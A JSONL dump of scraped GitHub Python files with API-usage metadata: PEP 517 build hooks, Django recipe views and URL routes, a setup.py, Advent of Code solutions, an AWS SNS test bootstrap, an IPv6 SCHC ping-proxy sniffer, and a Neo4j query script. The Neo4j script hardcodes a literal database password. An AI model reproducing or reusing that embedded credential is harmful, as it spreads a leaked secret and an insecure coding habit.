"django.db.models.CharField", "line_number": 125, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 126, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 126, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 142, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 145, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.db.models.DateTimeField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 147, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 149, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 149, "usage_type": "name"}]}
+{"seq_id": "34046069669", "text": "\"\"\"\nPEP 517 build hooks\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom typing import Mapping, Any\nimport os\nimport setuptools.build_meta as build_meta\n\n__all__ = [\n \"_supported_features\",\n \"build_sdist\",\n \"build_wheel\",\n \"build_editable\",\n \"get_requires_for_build_sdist\",\n \"get_requires_for_build_wheel\",\n \"get_requires_for_build_editable\",\n \"prepare_metadata_for_build_wheel\",\n \"prepare_metadata_for_build_editable\",\n]\n\nfrom pathlib import Path\nfrom loguru import logger\n\nfrom .project import Project\n\n\ndef _supported_features():\n return [\"build_editable\"]\n\n\ndef build_sdist(\n sdist_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: build_sdist\")\n return build_meta.build_sdist(sdist_directory, config_settings)\n\n\ndef build_wheel(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_wheel\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n project = Project(Path.cwd())\n return project.build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef build_editable(\n wheel_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n metadata_directory: str | None = None,\n) -> str:\n logger.debug(\"Build hook: build_editable\")\n logger.debug(f\"wheel_directory: {wheel_directory}\")\n # If not invoked indirectly by cxbuild itself do the default action\n if not os.environ.get('CBX_ACTIVITY'):\n return build_meta.build_editable(wheel_directory, config_settings, metadata_directory)\n return build_wheel(wheel_directory, config_settings, metadata_directory)\n\n\ndef get_requires_for_build_sdist(\n config_settings: dict[str, str | list[str]] | None = None # noqa: ARG001\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_sdist\")\n return build_meta.get_requires_for_build_sdist(config_settings)\n\n\ndef get_requires_for_build_wheel(\n config_settings: Mapping[str, Any] | None = None\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_wheel\")\n #return []\n return build_meta.get_requires_for_build_wheel(config_settings)\n\n\ndef get_requires_for_build_editable(self, config_settings=None):\n logger.debug(\"Build hook: get_requires_for_build_editable\")\n return get_requires_for_build_wheel(config_settings)\n\n\ndef prepare_metadata_for_build_wheel(\n metadata_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: prepare_metadata_for_build_wheel\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n\n\ndef prepare_metadata_for_build_editable(metadata_directory, config_settings=None):\n logger.debug(\"Build hook: build_editable\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n", "repo_name": "crungelab/cxbuild", "sub_path": "cxbuild/backend.py", "file_name": "backend.py", "file_ext": "py", "file_size_in_byte": 2998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "loguru.logger.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "setuptools.build_meta.build_sdist", "line_number": 38, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 38, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 46, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "project.Project", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path.cwd", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "project.build_wheel", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 57, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 58, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": "setuptools.build_meta.build_editable", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 61, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 68, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 68, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_sdist", "line_number": 69, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_wheel", "line_number": 77, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 77, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 90, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 90, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 96, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 96, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 97, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 97, "usage_type": "name"}]}
+{"seq_id": "713246750", "text": "from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom .serializers import ReceitaSerializer\nfrom .models import Receita\nfrom rest_framework import status\n\ndef index(request):\n return HttpResponse(\"Olá mundo! Este é o app notes de Tecnologias Web do Insper.\")\n\n# GET\n@api_view(['GET', 'POST', 'DELETE'])\ndef api_receita(request, receita_id):\n try:\n receita = Receita.objects.get(id=receita_id)\n except Receita.DoesNotExist:\n raise Http404()\n\n if request.method == 'POST':\n new_receita_data = request.data\n receita.title = new_receita_data['title']\n receita.content = new_receita_data['ingredients']\n receita.content = new_receita_data['preparo']\n receita.save()\n\n\n if request.method == 'DELETE':\n receita.delete()\n return Response(status.HTTP_204_NO_CONTENT)\n\n serialized_receita = ReceitaSerializer(receita)\n return Response(serialized_receita.data)\n\n\n#\n@api_view(['GET','POST'])\ndef api_receita_list(request):\n\n if request.method == \"POST\":\n new_receita_data = request.data\n receita = Receita()\n receita.title = new_receita_data['title']\n receita.ingredients = new_receita_data['ingredients']\n receita.preparo = new_receita_data['preparo']\n receita.save()\n\n receitas = Receita.objects.all()\n serialized_receitas = ReceitaSerializer(receitas, many=True)\n return Response(serialized_receitas.data)\n\n", "repo_name": "rodrigonigri/TecWeb-Projeto3-backend", "sub_path": "receita/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1550, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Receita.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Receita.DoesNotExist", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 17, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Receita", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Receita.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 48, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "28507254755", "text": "from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as file:\n readme = file.read()\n file.close()\n\nwith open(\"CHANGELOG.md\", \"r\") as file:\n readme += \"\\n\\n\"\n readme += file.read()\n file.close()\n\nsetup(\n name=\"aiodown\",\n version=\"1.0.7\",\n packages=find_packages(),\n install_requires=[\n \"async-files >= 0.4\",\n \"httpx[http2] >= 0.20\",\n \"humanize >= 3.2.0\",\n ],\n url=\"https://github.com/AmanoTeam/aiodown\",\n python_requires=\">=3.8\",\n author=\"AmanoTeam\",\n author_email=\"contact@amanoteam.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Topic :: Internet\",\n ],\n description=\"A fully async file downloader with httpx\",\n download_url=\"https://github.com/AmanoTeam/aiodown/releases/latest\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"python, downloader, async, asyncio, httpx, file\",\n project_urls={\n \"Bug report\": \"https://github.com/AmanoTeam/aiodown/issues\",\n \"Donate\": \"https://liberapay.com/AmanoTeam\",\n \"Source\": \"https://github.com/AmanoTeam/aiodown\",\n },\n)\n", "repo_name": "AmanoTeam/aiodown", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "32939602732", "text": "from pathlib import Path\n\n\ndef part_1() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n match = {\n \"X\": \"A\",\n \"Y\": \"B\",\n \"Z\": \"C\",\n }\n wins = {\n \"X\": \"C\", # rock beats scissors\n \"Y\": \"A\", # paper beats rock\n \"Z\": \"B\", # scissors beats paper\n }\n\n base_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if match[p2] == p1:\n total_score += 3 + base_score[p2]\n print(\"draw\")\n elif wins[p2] == p1:\n total_score += 6 + base_score[p2]\n print(\"win\")\n else:\n total_score += base_score[p2]\n print(\"loss\")\n return total_score\n\n\ndef part_2() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n loser_hands = {\n \"A\": \"C\", # rock beats scissors\n \"B\": \"A\", # paper beats rock\n \"C\": \"B\", # scissors beats paper\n }\n winner_hands = {\n \"C\": \"A\", # rock beats scissors\n \"A\": \"B\", # paper beats rock\n \"B\": \"C\", # scissors beats paper\n }\n\n base_score = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n }\n translate = {\n \"A\": \"rock\",\n \"B\": \"paper\",\n \"C\": \"scissors\",\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if p2 == \"Z\": # win\n winner_hand = winner_hands[p1]\n total_score += 6 + base_score[winner_hand]\n print(\n f\"must win, pick {translate[winner_hand]} against {translate[p1]}\"\n )\n elif p2 == \"X\": # lose\n loser_hand = loser_hands[p1]\n total_score += 0 + base_score[loser_hand]\n print(\n f\"must lose, pick {translate[loser_hand]} against {translate[p1]}\"\n )\n else: # draw\n total_score += 3 + base_score[p1]\n print(f\"must draw, pick {translate[p1]} against {translate[p1]}\")\n return total_score\n\n\nif __name__ == \"__main__\":\n print(part_1())\n print(part_2())\n", "repo_name": "rbusquet/advent-of-code", "sub_path": "aoc_2022/day02.py", "file_name": "day02.py", "file_ext": "py", "file_size_in_byte": 2461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "23349204010", "text": "import logging\n\nfrom acktest.bootstrapping import Resources, BootstrapFailureException\nfrom acktest.bootstrapping.sqs import Queue\nfrom acktest.bootstrapping.sns import Topic\nfrom acktest.aws.identity import get_region, get_account_id\n\nfrom e2e import bootstrap_directory\nfrom e2e.bootstrap_resources import BootstrapResources\n\ntopic1 = Topic(name_prefix=\"subscribe-topic\")\ntopic2 = Topic(name_prefix=\"adoption-subscribe-topic\")\n\nqueue_policy = \"\"\"{\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"sns.amazonaws.com\"\n },\n \"Action\": \"sqs:SendMessage\",\n \"Resource\": \"arn:aws:sqs:$REGION:$ACCOUNT_ID:$NAME\",\n \"Condition\": {\n \"ArnEquals\": {\n \"aws:SourceArn\": \"arn:aws:sns:$REGION:$ACCOUNT_ID:$TOPIC_NAME\"\n }\n }\n }\n ]\n}\n\"\"\"\n\nqueue1_policy_vars = {\n \"$TOPIC_NAME\": topic1.name,\n}\n\nqueue2_policy_vars = {\n \"$TOPIC_NAME\": topic2.name,\n}\n\ndef service_bootstrap() -> Resources:\n logging.getLogger().setLevel(logging.INFO)\n\n resources = BootstrapResources(\n Topic1=topic1,\n Topic2=topic2,\n Queue1=Queue(\n name_prefix=\"subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue1_policy_vars,\n ),\n Queue2=Queue(\n name_prefix=\"adoption-subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue2_policy_vars,\n ),\n )\n\n try:\n resources.bootstrap()\n except BootstrapFailureException as ex:\n exit(254)\n\n return resources\n\nif __name__ == \"__main__\":\n config = service_bootstrap()\n # Write config to current directory by default\n config.serialize(bootstrap_directory)\n", "repo_name": "aws-controllers-k8s/sns-controller", "sub_path": "test/e2e/service_bootstrap.py", "file_name": "service_bootstrap.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 11, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 42, "usage_type": "attribute"}, {"api_name": "e2e.bootstrap_resources.BootstrapResources", "line_number": 44, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 47, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 52, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.BootstrapFailureException", "line_number": 61, "usage_type": "name"}, {"api_name": "acktest.bootstrapping.Resources", "line_number": 41, "usage_type": "name"}, {"api_name": "e2e.bootstrap_directory", "line_number": 69, "usage_type": "argument"}]}
+{"seq_id": "337553348", "text": "import os\nimport sys\nsys.path.insert(0, '../..')\nimport binascii\nimport pprint\n\n# ----- SCHC ------\n\n\nfrom gen_rulemanager import *\nfrom compr_parser import *\nfrom gen_utils import dprint, dpprint\n\n\n# ----- scapy -----\n\nfrom kamene.all import *\n\nimport ipaddress\n\nclass debug_protocol:\n def _log(*arg):\n dprint(*arg)\n\nP = Parser(debug_protocol)\nRM = RuleManager()\n\ndef AnalyzePkt(packet):\n global RM\n \n dprint(len(packet), \"\".join([\"%02x\"%_ for _ in bytes(packet)]))\n\n withoutL2 = bytes(packet)\n\n print (\"\".join([\"%02x\"%_ for _ in withoutL2]))\n try:\n fields, data = P.parse(withoutL2, direction=T_DIR_DW)\n except:\n print (\"not a parsable packet\")\n return\n \n dpprint(fields)\n dprint(data)\n \n rule,dev_id = RM.FindRuleFromPacket(fields, direction=T_DIR_DW)\n pprint.pprint (rule)\n\n if rule == None:\n return\n \n if \"Action\" in rule:\n if rule[T_ACTION] == T_ACTION_PPING:\n print (\"proxy ping\")\n\n print (hex(fields[(T_IPV6_DEV_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_DEV_IID, 1)][0]))\n print (hex(fields[(T_IPV6_APP_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_APP_IID, 1)][0]))\n\n IPv6Src = (fields[(T_IPV6_DEV_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_DEV_IID, 1)][0]\n IPv6Dst = (fields[(T_IPV6_APP_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_APP_IID, 1)][0]\n\n\n IPv6SrcStr = ipaddress.IPv6Address(IPv6Src)\n IPv6DstStr = ipaddress.IPv6Address(IPv6Dst)\n\n IPv6Header = IPv6 (\n version = fields[(T_IPV6_VER, 1)][0],\n tc = fields[(T_IPV6_TC, 1)][0],\n fl = fields[(T_IPV6_FL, 1)][0],\n nh = fields[(T_IPV6_NXT, 1)][0],\n hlim = 30,\n src = IPv6SrcStr.compressed,\n dst = IPv6DstStr.compressed\n )\n\n txt = \"SCHC device is alive\"\n\n Echo = ICMPv6EchoReply(\n id = fields[(T_ICMPV6_IDENT, 1)][0],\n seq = fields[(T_ICMPV6_SEQNB, 1)][0],\n data = data\n #data = txt.encode() + data[len(txt):]\n )\n\n myMessage = IPv6Header / Echo\n myMessage.show()\n send (myMessage, iface=\"he-ipv6\")\n else:\n pass #should compresss\n \nif __name__ == '__main__':\n\n print (sys.argv)\n\n RM = RuleManager()\n RM.Add(file=\"example/comp-rule-100.json\")\n\n sniff (filter=\"ip6\", prn=AnalyzePkt, iface=\"he-ipv6\")\n", "repo_name": "openschc/openschc", "sub_path": "src/net_compression.py", "file_name": "net_compression.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "gen_utils.dprint", "line_number": 23, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 31, "usage_type": "call"}, {"api_name": "gen_utils.dpprint", "line_number": 42, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 43, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 46, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 64, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]}
+{"seq_id": "8116064835", "text": "from py2neo import Graph\r\n\r\ng = Graph(\"http://localhost:7474\", username=\"neo4j\", password=\"cooperck890303\")\r\nnum_limit = 20\r\n\r\n\r\nprint(1)\r\nqueries = [\"MATCH (m:project)-[r:contains_unit]->(n:unit) where m.id = '{0}' RETURN m.name, r.name, n.name, n.id\".format('DX-01')]\r\nprint(queries)\r\nanswers = []\r\nress = g.run(queries[0]).data()\r\nprint(ress)\r\nanswers += ress\r\nprint(answers)\r\n# unit_id = answers[0]['n.id']\r\n# print('unit_id',unit_id)\r\nprocess_id=[] # 存储流程id\r\nfor i in answers:\r\n sql_1 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where c.id = '{0}' RETURN a.id\".format(i['n.id'])]\r\n print(sql_1)\r\n ress_1 = g.run(sql_1[0]).data() # [{'a.id':XXX}]\r\n if len(ress_1) == 0:\r\n break\r\n#print(i['n.id'])\r\nprocess_id.append(i['n.id'])#输入第一个单元的id\r\n#print(process_id)\r\na = process_id[0]\r\nfor j in answers:\r\n sql_2 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where a.id = '{0}' RETURN c.id\".format(a)]\r\n print(sql_2)\r\n ress_2 = g.run(sql_2[0]).data()#[{'c.id':XXX}]\r\n if len(ress_2) ==0:\r\n break\r\n b=ress_2[0]['c.id']\r\n process_id.append(b)\r\n a=b\r\nprint(process_id) #得��按顺序的单元id\r\n# 下面找出单元id对应的单元名称\r\nprocess_name=[]\r\nfor k in process_id:\r\n sql_3 = [\"MATCH (a:unit) where a.id = '{0}' RETURN a.name\".format(k)]\r\n ress_3 = g.run(sql_3[0]).data() # [{'a.name':XXX}]\r\n n=ress_3[0]['a.name']\r\n process_name.append(n)\r\nprint(process_name)\r\nx='工艺流程为:{0}'.format('-->'.join(list(set(process_name))))\r\nprint(x)", "repo_name": "cooperck/QA_ReuseWater_KG", "sub_path": "test03.py", "file_name": "test03.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "py2neo.Graph", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "74516053609", "text": "from django.urls import path\nfrom django.contrib.auth import views as auth_views\n\n\nfrom imdb_api.views.main import frontpage, dashboard, admin_dashboard\nfrom imdb_api.views.signup import signup\nfrom imdb_api.views.login_view import login_view, logout_view\nfrom imdb_api.views.movies_view import (\n all_movies, new_movies, movie_details_with_trailers,\n movie_details, movie_search, base_genre_movies, genre_movies, dash_movie_search, genre_list\n )\nfrom imdb_api.views.movie_serializer_view import MovieView\nfrom imdb_api.views.genre_serializer_view import GenresView\nfrom imdb_api.views.user_recommendations import user_recommendations\n\nfrom imdb_api.views.admin_panel_view import AdminView\nfrom imdb_api.views.user_panel_view import vote_for_movie, toggle_favorite, user_update_profile, CommentView\n\n\napp_name = \"imdb\"\nurlpatterns = [\n path(\"\", frontpage, name='frontpage'),\n\n # path for user dashboard\n path(\"dashboard/\", dashboard, name='dashboard'),\n path('movie_search/', movie_search, name='movie_search'),\n path('dash_movie/', dash_movie_search, name='dash_movie_search'),\n path('user_update_profile/', user_update_profile, name='user_update_profile'),\n \n # path for admin dashboard\n path('admin_dashboard/', admin_dashboard, name='admin_dashboard'),\n path('update_profile//', AdminView.update_user_profile, name='update_profile'),\n path('see_all_users/', AdminView.see_all_users, name='see_all_users'),\n path(\"delete_user//\", AdminView.delete_user, name=\"del_user\"),\n path('see_all_genres/', AdminView.see_all_genres, name='see_all_genres'),\n path('add_genre/', AdminView.add_genre, name='add_genre'),\n path(\"delete_genre//\", AdminView.delete_genre, name=\"del_genre\"),\n path('see_all_movies/', AdminView.see_all_movies, name='see_all_movies'),\n path('add_movie_not_authomatic/', AdminView.add_movie_not_authomatic, name='add_movie_not_authomatic'),\n path(\"update_movie//\", AdminView.update_movie, name=\"update_movie\"),\n # path for Signup, Login, Logout\n path(\"signup/\", signup, name=\"signup\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path('recommendations/', user_recommendations, name='user_recommendations'),\n path('vote_for_movie//', vote_for_movie, name='vote_for_movie'),\n path('toggle_favorite//', toggle_favorite, name='toggle_favorite'),\n\n # path for all movie infos.\n path('all_movies/', all_movies, name='all_movies'),\n path('new_movies', new_movies, name='new_movies'),\n path('movie_details//', movie_details, name='movie_details'),\n path('detail&trailer//', movie_details_with_trailers, name='detail&trailer'),\n path('genre_movies//', genre_movies, name='genre_movies'),\n path('base_genre_movies//', base_genre_movies, name='base_genre_movies'),\n path('genres/', genre_list, name='genre_list'),\n \n # path for comments\n path('comment//', CommentView.as_view(), name='comment'),\n \n # APIs for movies\n path(\"apis/movies/\", MovieView.as_view(), name=\"apis_movies\"),\n path(\"apis/movies//\", MovieView.as_view(), name=\"apis_movies\"),\n # APIs for genres\n path(\"apis/genres/\", GenresView.as_view(), name=\"genres\"),\n path(\"apis/genres//\", GenresView.as_view(), name=\"genre\"),\n \n\n\n]\n\n \n \n\n\n", "repo_name": "MarcinIgna/imdb-django-api", "sub_path": "imdb_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "imdb_api.views.main.frontpage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "imdb_api.views.main.dashboard", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_search", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.dash_movie_search", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.user_update_profile", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "imdb_api.views.main.admin_dashboard", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_user_profile", "line_number": 32, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_users", "line_number": 33, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_user", "line_number": 34, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_genres", "line_number": 35, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_genre", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_genre", "line_number": 37, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_movies", "line_number": 38, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_movie_not_authomatic", "line_number": 39, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_movie", "line_number": 40, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 40, "usage_type": 